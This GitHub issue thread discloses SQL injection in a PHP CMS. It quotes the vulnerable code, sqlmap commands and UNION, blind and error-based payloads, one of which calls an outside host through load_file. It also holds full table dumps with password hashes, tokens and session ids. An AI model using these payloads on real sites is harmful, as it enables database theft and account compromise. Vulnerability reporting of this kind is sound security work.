Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in categorymenu page #14

Open
b1u3s opened this issue Mar 3, 2022 · 4 comments
Open

SQL injection in categorymenu page #14

b1u3s opened this issue Mar 3, 2022 · 4 comments

Comments

@b1u3s
Copy link

b1u3s commented Mar 3, 2022

Description

I found a SQL inject vulnerability in page categorymenu.php and I build a local environment to test it.

The url is http://127.0.0.1/PHP-CMS/categorymenu.php

image

The problem code is here.

 <?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];
}
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

Users can control the parameter "category" by GET method without any filter,and get something that shouldn't have been queried.Such as,if "category" is changed like "-1 union select 1,2,user(),4,5,6,7,8,9,10,11",you will get the database user:

image

Proof

I use the sqlmap to do this.

1.Get database information.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 --dbs

image

2.Select a database and get table information

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms --tables

image

3.Select a table and get the columns

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users --columns
image

4.Select the columns and get column contents.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users -C username --dump
image

Solution

You can fix it by add some filter rules on the parameter "category",such as ban the letter characters.

@nu11secur1ty
Copy link

nu11secur1ty commented Apr 11, 2022

Multiple SQLi

STATUS Critical! =)

Dude, you must delete this project, please! What kind of web developer are you? 😲

Infected apps:

http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php 
http://pwned_host.com/PHP-CMS-master/search.php 

Payloads:

---
Parameter: category (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) OR NOT 2848=2848

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 4559 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(4559=4559,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) AND (SELECT 5517 FROM (SELECT(SLEEP(5)))RgGf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: category=(select load_file('\\\\q3uuxrcogrxwpaeoschnmxmtxk3dr4fvhj86yun.github.com/harshitbansal373/PHP-CMS\\hns')) UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x797054776f65536e4a79476a475a6f6a4e5156644c427a4a534368524f65764a4e585a4b7258656f,0x716b766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

Dump:

Database: cms
Table: users
[4 entries]
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| user_id | token                                                                                                | randSalt                      | username      | user_role  | user_email           | user_image | user_lastname | user_password                                                | user_firstname |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+
| 17      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | harshitbansal | admin      | example@gmail.com    | <blank>    | bansal        | $2y$10$iusesomecrazystrings2uvgnjnDOGIE6JPA9zzq36EdPnYMUav/S | harshit        |
| 20      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | priyanka      | subscriber | example@gmail.com    | <blank>    | sharma        | $2y$12$JWAZjgfODGxhEpsJShk4TO5MHGZ/hUnliFfkwPEvsLkfCJOdJ6ugy | priyanka       |
| 22      | 77020c98efbc545715012c76bec5aaec6e8a2cfced12d25f1c2f2626a1ef4af2271b1e458848d80a745e6b578b954cf34427 | $2y$10$iusesomecrazystrings22 | raghuveer     | subscriber | example123@gmail.com | <blank>    | singh         | $2y$12$kTq/GUEkryih.nT9O77KfeyMp9165ZIqlvu1dEOQLKW8RWv0te46W | raghuveer      |
| 26      | <blank>                                                                                              | $2y$10$iusesomecrazystrings22 | raghuveer23   | subscriber | example@gmail.com    | <blank>    | sharma        | $2y$12$23Bqzby0qrz3VfojjbZjT.e4nwL7a68nJk7A4E9bgolDlWmG0lL7m | raghuveer      |
+---------+------------------------------------------------------------------------------------------------------+-------------------------------+---------------+------------+----------------------+------------+---------------+--------------------------------------------------------------+----------------+

[14:47:11] [INFO] table 'cms.users' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users.csv'
[14:47:11] [INFO] fetching columns for table 'posts' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'posts' in database 'cms'
Database: cms
Table: posts
[9 entries]
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| post_id | post_category_id | post_date  | post_tags                              | post_user     | post_image                  | post_title   | post_status | post_content                                                                                                                                                                                                                               | post_views_count | post_comment_count |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+
| 1       | 1                | 2018-10-16 | harshit,website                        | harshitbansal | Boeremark.jpg               | Website      | draft       | you are doing well...\r\n                                                                                                                                                                                                                  | 1                | 2                  |
| 2       | 1                | 2018-10-21 | life,Rajesh,How to work                | raghuveer     | 544106281_1280x720.jpg      | How to work? | draft       | you should move on without afraid of what will the curcumstances...                                                                                                                                                                        | 2                | 0                  |
| 3       | 1                | 2018-10-24 | Android, namandeep, mobile, smartphone | priyanka      | work-life-balance.jpg       | Android      | published   | Android is a mobile operating system developed by Google, based on a modified version of the Linux kernel and other open source software and designed primarily for touchscreen mobile devices such as smartphones and tablets             | 1                | 1                  |
| 8       | 1                | 2019-01-10 | life , ctrl                            | harshitbansal | life-008.jpg                | life         | published   | life has no ctrl+z \r\nhahahaha                                                                                                                                                                                                            | 0                | 0                  |
| 10      | 1                | 2018-10-21 | time, money                            | raghuveer     | time.jpeg                   | Time         | published   | time is money.                                                                                                                                                                                                                             | 0                | 1                  |
| 11      | 1                | 2018-10-21 | goes on, suresh, life                  | raghuveer     | life-expectancy-decline.jpg | Goes on      | published   | this is the content for this post.                                                                                                                                                                                                         | 0                | 0                  |
| 12      | 3                | 2018-10-30 | dvjdjsv                                | vijay         | <blank>                     | fdnbkfd      | d,jvsd      | bdssvkbdsk                                                                                                                                                                                                                                 | 0                | 0                  |
| 13      | 1                | 2018-11-08 | vinod, diwali                          | vijay         | <blank>                     | diwali       | published   | <p>hello frnds happy diwali!!</p>                                                                                                                                                                                                          | 0                | 0                  |
| 14      | 3                | 2019-01-10 | accounts, tanya, bela                  | priyanka      | <blank>                     | accounts     | published   | <p>accounting is an identifying process</p>                                                                                                                                                                                                | 0                | 0                  |
+---------+------------------+------------+----------------------------------------+---------------+-----------------------------+--------------+-------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------+--------------------+

[14:47:11] [INFO] table 'cms.posts' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\posts.csv'
[14:47:11] [INFO] fetching columns for table 'comments' in database 'cms'
[14:47:11] [INFO] fetching entries for table 'comments' in database 'cms'
Database: cms
Table: comments
[5 entries]
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| comment_id | comment_post_id | comment_date | comment_email     | comment_author | comment_status | comment_content |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+
| 25         | 1               | 2019-01-16   | example@gmail.com | daau           | show           | vfadvcv         |
| 26         | 1               | 2019-01-16   | example@gmail.com | dinesh         | show           | vfvfdvfsv       |
| 27         | 2               | 2019-01-16   | example@gmail.com | daau           | show           | fvfvfev         |
| 28         | 2               | 2019-01-16   | example@gmail.com | dinesh         | show           | vfbgrbrt        |
| 37         | 2               | 2019-01-19   | example@gmail.com | fdgd           | show           | cxvfv           |
+------------+-----------------+--------------+-------------------+----------------+----------------+-----------------+

[14:47:12] [INFO] table 'cms.comments' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\comments.csv'
[14:47:12] [INFO] fetching columns for table 'users_online' in database 'cms'
[14:47:12] [INFO] fetching entries for table 'users_online' in database 'cms'
[14:47:12] [INFO] recognized possible password hashes in column '`session`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[14:47:12] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\CVE\sqlmap\data\txt\nu11secur1ty.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[14:47:12] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:47:12] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[14:47:12] [INFO] starting 8 processes
[14:47:13] [WARNING] no clear password(s) found
Database: cms
Table: users_online
[4 entries]
+----+------------+----------------------------------+
| id | time       | session                          |
+----+------------+----------------------------------+
| 28 | 1541324861 | acqtk6uivrc3mancr6jubo36g8       |
| 40 | 1548511410 | ipke8cras4eauiu50upkm1mocd       |
| 41 | 1548401977 | l4qj6m6jv3ges0us7cqvrqovhq       |
| 42 | 1562584762 | fd7b414bec20e569f9bd17c4e7ef4c13 |
+----+------------+----------------------------------+

[14:47:13] [INFO] table 'cms.users_online' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\users_online.csv'
[14:47:13] [INFO] fetching columns for table 'categories' in database 'cms'
[14:47:14] [INFO] fetching entries for table 'categories' in database 'cms'
Database: cms
Table: categories
[5 entries]
+--------+-------------------------------------------+-----------+---------------+
| cat_id | cat_user                                  | cat_title | cat_creator   |
+--------+-------------------------------------------+-----------+---------------+
| 1      | harshit,raghuveer23,raghuveer,vikas,daau, | home      | harshitbansal |
| 3      | <blank>                                   | service   | harshitbansal |
| 5      | <blank>                                   | contact   | harshitbansal |
| 7      | raghuveer,                                | about     | harshitbansal |
| 55     | <blank>                                   | hello     | harshitbansal |
+--------+-------------------------------------------+-----------+---------------+

[14:47:14] [INFO] table 'cms.categories' dumped to CSV file 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com\dump\cms\categories.csv'
[14:47:14] [INFO] fetched data logged to text files under 'C:\Users\nu11secur1ty\AppData\Local\sqlmap\output\pwned_host.com'

[*] ending @ 14:47:14 /2022-04-11/

BR @nu11secur1ty - Penetration Testing Engineer

@zentery
Copy link

zentery commented Aug 30, 2024

How to fix it? Could you please provide a patch?

@nu11secur1ty
Copy link

How to fix it? Could you please provide a patch?

I will help you soon as I can :)
BR

@zentery
Copy link

zentery commented Sep 7, 2024

@nu11secur1ty This is an interesting vulnerability with academic research significance. I look forward to your patch. Thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants